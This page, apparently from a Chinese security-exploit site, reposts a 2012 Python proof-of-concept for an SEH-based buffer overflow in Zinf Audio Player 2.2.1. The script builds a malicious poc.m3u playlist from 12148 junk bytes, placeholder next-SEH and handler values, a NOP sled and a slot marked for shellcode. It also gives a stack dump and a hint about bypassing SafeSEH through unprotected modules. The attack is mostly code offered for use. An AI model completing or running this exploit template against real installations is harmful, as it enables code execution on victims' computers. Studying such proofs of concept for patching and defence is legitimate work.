Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)

来源：manindark.bca@gmail.com 作者：mAniNdArK 发布时间：2012-03-19

#!/usr/bin/python


#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer.On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------

print ("Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n");
print ("Version:       2.2.1\n");
print ("Date:          3-18-2012\n");
print ("Author:         mAniNdArK\n");
print ("Software Link: http://www.zinf.org\n");
print ("Category: Local\n");
print ("Tested on:     Windows XP SP3 Professional(En)\n");

print ("Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n");
print ("34GL3_3Y3,5!L3NT @55@55!N,s1l3n7 BD,\n");
print ("Rudr0 Akash,p5YcH0 d0d93r And All The Members\n");
print ("Of Bangladesh Cyber Army(BCA)\n");
print "Mail:manindark.bca@gmail.com"
print "---------------------------------------------------------\n";


#0198F9B4   41414141  AAAA
#0198F9B8   41414141  AAAA
#0198F9BC   41414141  AAAA
#0198F9C0   41414141  AAAA
#0198F9C4   41414141  AAAA
#0198F9C8   41414141  AAAA
#0198F9CC   41414141  AAAA
#0198F9D0   41414141  AAAA
#0198F9D4   41414141  AAAA
#0198F9D8   41414141  AAAA
#0198F9DC   41414141  AAAA
#0198F9E0   41414141  AAAA
#0198F9E4   41414141  AAAA
#0198F9E8   41414141  AAAA
#0198F9EC   41414141  AAAA
#0198F9F0   41414141  AAAA
#0198F9F4   41414141  AAAA
#0198F9F8   41414141  AAAA
#0198F9FC   42424242  BBBB  Pointer to next SEH record
#0198FA00   43434343  CCCC  SE handler
#0198FA08   90909090  ....
#0198FA0C   44444444  DDDD
#0198FA10   44444444  DDDD

#instruction:
#Right click and select open...
#And select playlist file poc.m3u"

file="poc.m3u"

junk="\x41"*12148
nseh="B"*4     # Address=42424242 SE handler=*** CORRUPT ENTRY ***  use a short jmp here...
seh="C"*4       # Address=0198F9FC SE handler=43434343
                #there are lots of modules without safeseh..like download.ui...u can use it to bypass seh..
nop="\x90"*8 
shellcode="D"*1000 #shellcode will go here


                   
try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( junk +nseh+seh+ nop+ shellcode)
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告